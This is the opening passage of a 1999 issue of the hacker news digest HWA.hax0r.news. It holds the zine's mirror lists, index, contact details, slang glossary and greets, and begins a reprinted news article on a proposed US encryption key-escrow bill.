[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=] Number 30 Volume 1 1999 Aug 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

New mirror sites

http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and
airportman for the Cubesoft bandwidth. Also shouts out to all our mirror
sites! tnx guys.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html          ** NEW **
http://www.alldas.de/hwaidx1.htm                 ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that
affect the online underground and netizens in general. This includes coverage
of general security issues, hacks, exploits, underground news and anything
else I think is worthy of a look see. (remember i'm doing this for me, not
you, the fact some people happen to get a kick/use out of it is of secondary
importance).

This list is NOT meant as a replacement for, nor to compete with, the likes of
publications such as CuD or PHRACK or with news sites such as AntiOnline, the
Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could
any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a reference
to those who follow the culture by keeping tabs on as many sources as possible
and providing links to further info, it's a labour of love and will be
continued for as long as I feel like it, i'm not motivated by dollars or the
illusion of fame, did you ever notice how the most famous/infamous hackers are
the ones that get caught? there's a lot to be said for remaining just outside
the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #30
=-----------------------------------------------------------------------=

We could use some more people joining the channel, it's usually pretty quiet,
we don't bite (usually) so if you're hanging out on irc stop by and idle a
while and say hi...

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ...
***                       someone is usually around 24/7        ***
***                                                             ***
*** Note that the channel isn't there to entertain you it's for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #30
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. Key Escrow bill up for vote again
04.0 .. The lost art of IRC warfare using eggdrop bots
05.0 .. Finally a working redhat 5.2 local exploit - From BlackBox issue #1
06.0 .. The State of Crypto today
07.0 .. Using a backdoor in a firewalled system
08.0 .. PacketStorm Security Sells Out?
09.0 .. CryptoGram Aug 15th '99
10.0 .. TELNET.EXE HEAP OVERFLOW
11.0 .. SECURITY THROUGH OBSCURITY VS FULL DISCLOSURE
12.0 .. THE MUSIC INDUSTRY'S "CYBER-SHERIFF"
13.0 .. ReDaTtAcK CHARGED ANYWAYS
14.0 .. NA/MCAFEE RELEASES NEW VIRUS SERVICE
15.0 .. TWO CHARGED WITH PROMOTING "DATE-RAPE" DRUG ON THE NET
16.0 .. E-COMMERCE AND PRIVACY
17.0 .. IDENTITY-THEFT
18.0 .. Y2K-THE MOVIE
19.0 .. 19 ARRESTED ON CHILD PORNOGRAPHY CHARGES
20.0 .. Y2K PROBLEMS
21.0 .. GISB WILL USE PGP
22.0 .. SURF ANONYMOUS FOR $5
23.0 .. HACKER LAUNCHES GRUDGE-ATTACK AGAINST FORMER EMPLOYER
24.0 .. PROJECTGAMMA BACK ONLINE
25.0 .. DETECTING INTRUDERS IN LINUX
26.0 .. WIRELESS CRIME-FIGHTING
27.0 .. 15-YEAR-OLD ADMITS HACKING INTO TCS
28.0 .. JAPAN CLEARS WIRETAP BILL
29.0 .. Warez Groups Hit With Racketeering Charges
30.0 .. Public UK Sites Susceptible to Attack
31.0 .. Mitnick Prosecutor Moving to Private Practice
32.0 .. NIPC Head Talks About FidNet
33.0 .. Spoofing revisited (w00w00)
34.0 .. 2 Swedish men charged with hacking U.S computers
35.0 .. Feds delay network
36.0 .. The Effects of War on the Yugoslavian Network
37.0 .. Survey Finds Internet Full of Holes
38.0 .. Hacking Into an IT Career
39.0 .. SETI@Home, Largest Computation Ever
40.0 .. Hong Kong Blondes Labeled a Fraud
41.0 .. Peace Prize Winner Warns of Cyber War
42.0 .. Mitnick Still Denied Kosher Food
43.0 .. Cable Pirates Busted
44.0 .. CSIS Admits Web Defacement
45.0 .. Win32.Kriz Set To Go Off Christmas Day
46.0 .. MS Windows Media Audio Broke One Day After Release
47.0 .. Available Soon, Freedom!
48.0 .. AOL hacking IM users?
49.0 .. Anti-gay site is hacked
50.0 .. Indonesian CyberWar? Or Not?
51.0 .. Gov Wants to Break Into Personal Computers, Legally
52.0 .. Hearings to be Held on Echelon
53.0 .. AOL Password Scam Uncovered
54.0 .. Bronc's Defcon VII Review
55.0 .. Y2K Survival Catalog
56.0 .. BELGIAN BANK COMPROMISED
57.0 .. CARDING IN NEWCASTLE
58.0 .. U.S.-British Cyber-Spy System Puts European Countries on Edge
59.0 .. Watching the digital detectives
60.0 .. Microsoft acknowledges software glitch that exposes e-mail passwords
61.0 .. U.S to seek new computer surveillance power
62.0 .. Code cracker worries cryptographers
63.0 .. AntiOnline offers infosec website hosting
64.0 .. PKI yesterday, today and tomorrow
65.0 .. Microsoft Advisory, double byte code page vulnerability
66.0 .. RHSA denial of service attack in in.telnetd
67.0 .. [EuroHaCk] stealth-code
68.0 .. RHSA; buffer overflow in libtermcap tgetent()
69.0 .. Possible AOL IM buffer overflow
70.0 .. L0pht security advisory: Attackers can remotely add default route entries
71.0 .. Setuid bug in Oracle
72.0 .. Vulnerability In LSA on Windows NT SP5
73.0 .. w00w00's efnet ircd advisory (exploit included)
74.0 .. hiperbomb.c - reboot a hiperarc router
75.0 .. HP Security Bulletins Digest
76.0 .. cfingerd exploit
77.0 .. Microsoft Advisory: Patch Available for "Terminal Server Connection Request Flooding"

=--------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return that's tres cool, if not we'll consider ur ad anyways so
          send it in. ads for other zines are ok too btw just mention us in
          yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send
          in your suggestions and ads now... n.b date and time may be pushed
          back join mailing list for up to date information.
          Current dates: POSTPONED til further notice, place: TBA.

Ha.Ha  .. Humour and puzzles
          Hey You!
          =------=
          Send in humour for this section! I need a laugh and it's hard to
          find good stuff... ;)

SITE.1 .. Featured site
H.W    .. Hacked Websites
A.0    .. APPENDICES
A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF "ME EITHER"S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR
EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email
cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected.
News is news so i'll print any and all news but will quote sources when the
source is known, if it's good enough for CNN it's good enough for me. And i'm
doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you
have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed matter
like newspaper clippings a subscription to your cool foreign hacking zine or
photos, small non-explosive packages or sensitive information etc etc well,
now you can. (w00t) please no more inflatable sheep or plastic dog droppings,
or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places it is
cost prohibitive but if you have the time and money be a cool dude / gal and
send a poor guy a postcard preferably one that has some scenery from your
place of residence for my collection, I collect stamps too so you kill two
birds with one stone by being cool and mailing in a postcard, return address
not necessary, just a "hey guys being cool in Bahrain, take it easy" will do
... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600
  meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner,
  *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram
  etc format or .mp*

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance) Unless otherwise noted, like msgs from
lists or news from other sites, articles and information is compiled and or
sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+ Various mailing lists and some newsgroups, such as ...
+ other sites available on the HNN affiliates page, please see
  http://www.hackernews.com/affiliates.html as they seem to be popping up
  rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/              Electronic Underground Affiliation
http://ech0.cjb.net                     ech0 Security
http://axon.jccc.net/hir/               Hackers Information Report
http://net-security.org                 Net Security
http://www.403-security.org             Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide, if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and may
be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

Link

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential
"noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible
for the words that you post on this list and that reproduction of those words
without your permission in any medium outside the distribution of this list
may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available on
http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane
Systems, the author of "Applied Cryptography," and an inventor of the
Blowfish, Twofish, and Yarrow algorithms. He served on the board of the
International Association for Cryptologic Research, EPIC, and VTW. He is a
frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
i'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( ''   ''     ): Currently active/IRC+ man in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media

Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck .........................: Netherlands/Holland

Please send in your sites for inclusion here if you haven't already also if
you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will
be posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about otherwise
   enjoy - Ed ...

@HWA

00.4 What's in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeonholed with those 'dumb leet (l33t?) dewds'
this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to
all you up and comers, i'd highly recommend you get that book. It's almost
like buying a clue. Anyway.. on with the show ..

- Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq it won't be
reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below: Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavy equals" sign means "almost equal" to. If written
           an =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just typed
           all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go to
           swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear,
           get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
           hacker speak he's the guy that breaks into systems and is often
           (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
           I like jalapeno pepper dip or chives sour cream and onion, yum
           - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
           ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary
EoA      - End of Article or more commonly @HWA
EoF      - End of file
EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
           difficult to define, I think it is best defined as pop culture's
           view on The Hacker ala movies such as well erhm "Hackers" and The
           Net etc... usually used by "real" hackers or crackers in a
           derogatory or slang humorous way, like 'hax0r me some coffee?' or
           'can you hax0r some bread on the way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin' way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates: H  - hacking, hacktivist
                       C  - Cracking
                       V  - Virus
                       W  - Warfare
                       A  - Anarchy (explosives etc, Jolly Roger's Cookbook
                            etc)
                       P  - Phreaking, "telephone hacking" PHone fREAKs ...
                       CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in the
           manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, no one can say this without
           severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
           shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd like to
see more reader input, help me out here, what's good, what sucks etc, not
that I guarantee i'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet
Pyra
TwstdPair
_NeM_
D----Y
Dicentra
vexxation
sAs72
Spikeman
p0lix

Ken Williams/tattooman of PacketStorm, hang in there Ken...:(

& Kevin Mitnick (Happy Birthday)

kewl sites:

+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ******
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

Thanks to myself for providing the info from my wired news feed and others
from whatever sources, also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(No mail worthy of posting here this issue,)

02.0 From the editor.
~~~~~~~~~~~~~~~~

/* The header names were lost when this issue was mirrored as HTML;
 * stdio.h is the one printf() needs. */
#include <stdio.h>

int main(void)
{
    printf ("Read commented source!\n\n");
    /*
     * Issue #30... no comments this issue ...
     *
     *
     *
     * send submissions to: hwa@press.usmc.net
     */
    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main
address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go
to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to
cruciphux@dok.org

danke.

C*:.

03.0 Key-Escrow on the Move - Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.hackernews.com/

contributed by evilwench

They aren't giving up.
The Cyberspace Electronic Security Act is currently being drafted by the Clinton administration. In this latest bill, the administration proposes that law enforcement agents have access to decryption keys held by recovery agents. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents.

(Maybe the feeling is that if they keep submitting new bills, one of them, eventually, will get through. Unfortunately they are probably correct.)

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0816/fcw-newsencrypt-08-16-99.html

AUGUST 16, 1999

Bill reopens encryption access debate

BY DOUG BROWN (dbrown@fcw.com) AND L. SCOTT TILLETT (scott_tillett@fcw.com)

Renewing efforts to allow law enforcement agencies to access and read suspected criminals' encrypted electronic files, the Clinton administration has drafted a bill that would give those agencies access to the electronic "keys" held by third parties.

The Cyberspace Electronic Security Act, the drafting of which is being led by the Office of Management and Budget and the Justice Department, "updates law enforcement and privacy rules for our emerging world of widespread cryptography," according to an analysis accompanying the bill obtained by Federal Computer Week.

Encryption technology, according to the draft, is "an important tool for protecting the privacy of legitimate communications and stored data" but also has been used "to facilitate and hide unlawful activity by terrorists, drug traffickers, child pornographers and other criminals."

The new bill seeks to uncover that activity by allowing law enforcement officials to obtain the keys needed to decrypt messages by applying for search warrants or court orders, much as they might do to uncover other evidence.
The administration is concerned about the use of encryption technology because advances in recent years have made it extremely difficult for law enforcement officials to crack a code once they have intercepted a message.

The draft bill is the Clinton administration's latest effort to push for legislation that would make it easier for law enforcement agencies to intercept messages or data that they think would be helpful in criminal investigations. In 1993 the administration introduced the Clipper Chip, a hardware-based encryption device designed to protect private communications but that would provide a "backdoor" for law enforcement officials to decrypt necessary data. The Clipper effort died after privacy groups and industry warned that law enforcement agencies could abuse the power.

"All this is the Clipper Chip revisited in a different flavor but not as effective," said Michael Anderson, president of computer forensics firm New Technologies Inc.

The administration also has blocked the export of certain advanced encryption technology that would defeat efforts to conduct digital wiretaps as part of its fight against international drug cartels and terrorists. But the software industry continues to fight for the lifting of export restrictions.

In the latest bill, the administration proposes that law enforcement agents have access - under limited circumstances - to decryption keys held by recovery agents, which are third-party warehouses of decryption keys that "unlock" complex codes that mask the readable form of the data. The proposed law also allows the government to obtain search warrants to find decryption keys if they are not held by recovery agents.

The proposed bill would provide new protections for lawful users of encryption. Currently, according to a summary of the bill that is part of a proposed letter to House Speaker Dennis Hastert (R-Ill.), there are few laws guiding how recovery agents treat the decryption keys they store.
